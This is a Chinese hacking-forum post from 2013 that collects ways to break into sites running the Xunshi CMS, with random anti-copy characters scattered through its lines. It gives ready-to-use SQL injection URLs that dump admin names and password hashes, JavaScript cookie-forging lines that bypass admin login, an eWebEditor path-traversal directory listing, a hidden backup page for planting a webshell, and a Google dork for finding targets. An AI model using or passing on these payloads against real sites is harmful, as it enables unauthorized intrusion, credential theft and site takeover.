找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 讯时漏洞总结
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2382|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
by:血封忆尘; n5 _0 l2 X" g
: q. `  b: H; B$ o$ m  J1 S" Y
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
  g  x4 ?5 L$ n' s# f
; k% h; t+ ^# b* e4 L9 @# q: {以下本文总结来自黑防去年第9期杂志上的内容...
' T9 ~! j  p' ]/ W) V! N3 |) P  z$ p' ^+ X$ D: V
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%4 M% h- s( ^7 a, l6 m+ X  V
  n9 h. O) Q6 ^' g1 c/ X: P+ |7 ]* ^' X
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
( ]8 S9 a# c/ E& t/ ?5 E7 m1 Y
* h, L5 c' g) |记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况1 o+ f/ w1 l2 R
这里一个注入
6 w% c1 h4 {. ^% h+ O9 Z( {) U/ h/ `# R) z0 Y
效果如图:' l" [4 j5 l1 m* A
, y/ I4 @9 Q) C! n7 H
) ^% p+ N8 p2 D2 w  f' ~! k/ C, a& [
* A3 K" Y- r# a# A7 e5 i  F
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.' ^& T" s0 {4 T( q" }( G: ]
0 |1 P" K9 @' r- C5 p4 C# j$ W7 X
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
" A) o& B/ r* X2 K; H; V
/ R+ y0 t- Q" u& F! X# Hjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));- K# a" u+ w" F0 L4 B4 o5 j8 y
% F- K: \9 Y: f! _2 C/ G
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
1 k6 n4 m! x: h, X
$ m# T( T+ i* v因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
  \' F1 U5 N3 Z4 ^2 `! u* l# ]* f, j$ B
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
/ {  G# Q# L6 V( l5 ]  u  b3 ]6 U, i
# m& B4 n# [9 Y' ?, |1 t访问这页面来列目录..步骤如下:
4 Z, L9 m6 D  C4 J* z( x
( J: I" @6 ^3 }/ o$ u0 X6 rjavascript:alert(document.cookie="admindj=1")
5 U9 M- Z7 R  B; q+ M# H. i- s: }4 W
http://www.political-security.co ... asp?id=46&dir=../..% y1 H. W. I( H2 s& m) L" }
  I$ A, {3 l" M6 }' i' c# z0 @
效果如图:  B$ m4 l6 ?+ a% O* |: k

. X% p; e( |4 v9 L 6 w/ ^) {. \  v  J
+ p# w0 c* @0 K5 G
这样全站目录都能瞧了..找到后台目录..进去..
  t# \1 ?0 M7 J& H' U7 Y2 _! u7 w) I  A) _
那么进了后台怎么拿shell??上传--备份就ok了..
: }. ~, [, i& e+ y5 q% F* x6 o, i! J5 E' v$ W
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
% r5 ^* Y" R, a; y( H! H7 ]
6 j, K% U  v, Z* Y3 c" j+ d这个我也碰到过一次..你都可以通过列目录来实现..
4 V& X% ]; l0 I6 R& T( x) O& p+ \- @0 F5 S8 t3 C% B
javascript:alert(document.cookie="admindj=1") % |) P: p2 j$ p( G; J7 h; [

: l' [2 t; y% t) ^  N* K! q1 lhttp://www.political-security.co ... p?action=BackupData & K2 N8 t7 z3 q8 w2 F$ \$ q
: I) t: o/ h6 H3 K6 V: S; ^) I
备份ok..
' p/ \0 _( R6 k. C8 G8 K4 c
8 J2 K! ~  u6 J那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?3 M0 p+ ~; J. K: Q' M* F

8 Z$ r, R) x+ Y* j% P" v在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下; m8 ?- d3 ]5 d
& I3 Y/ T2 ]9 s7 i! N
然后访问此页面进行注入..步骤如下:6 v/ \, A- e# f/ q5 h7 \! g1 e) X! X

/ \3 K1 p( E7 Y6 ?javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")' B; k" I4 o- [- t: H: |& f

# f6 }$ b! v7 Y- q然后请求admin/admin_chk.asp页面) x7 ^7 A6 ~, `; [8 \
; t8 T% p* L4 @$ H: s
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
+ e2 ~2 b, c) q5 x! T* T- O4 W, J6 w- z) Z3 c, _  l5 ?
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin4 k+ x9 E# v; Q: w8 A, `
! W4 {# T6 W) R1 N! s) X
效果如图所示:
  F9 K) x& o6 q. ?
, r! ^0 j, d2 p& g) u+ {
1 y3 a* G* G5 J' a- r& D8 ^/ Q3 t4 Y$ F# Y3 Q: R0 p
讯时漏洞2
& L  ~7 N! ?; i- {7 Ngoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
4 o8 u) a9 X" V' G ' e. v. v0 I1 l- s& X
1、/admin/admin_news_pl_view.asp?id=1
1 y" A: @& q& D: k//id任意 填入以下语句' J$ M1 ~7 b  m, A' I) y

( g6 X7 n: j' A" Y, d2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!! p1 ~3 i2 X$ S- s

) [  `) D+ f4 I, C) q- c) P7 `+ ?; V1 R5 M$ S' ~  |
( R0 I* T5 n" X! l' u/ N8 b+ `
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
/ z/ {. W. P" e$ F- Y
4 }  X" B0 y8 j& E) @# x
1 h  G# N4 E; I& a0 s( F
$ o2 p2 _, o* m% v爆出管理员帐号和密码了
0 h, f9 s9 U. G
& X, I& b# }, n. n6 K1 N# l" j9 v" }
2 z9 f4 t6 i1 s% b; {
4、cookies进后台& s, O. o0 w0 @

" a" I& Y% _! S; A  k- ]javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));. [# P1 t# v; n! g) {

9 ^. i6 E* f% ?, s4 S5 h- _- ~# c# ?& L4 Q
! I6 _% p7 b1 U- |6 }
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
; x( D* U. L: ]3 ?  q. k 3 z: V1 Y  q" }( j6 j8 b+ s- ]

% c5 j* S5 C/ m" ?1 ?! l8 i: c, Y: i. y+ L6 c2 y4 L( F9 X: c
6、后台有上传和备份取SHELL不难。+ b: B+ `) q5 @5 d( q

2 T0 |0 }0 ]( I% n3 a& \: F7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..& @; @  L2 L, Y. P% d5 _8 t
  X( H8 X6 U: P% w  N
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
0 O3 E5 i. G6 |- f0 ^  U; R8 {! l. y9 Y* q  e. C( x7 Y$ ^, n
7 m" V! p0 c( L; I
8 C  _8 {1 R( i9 \
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表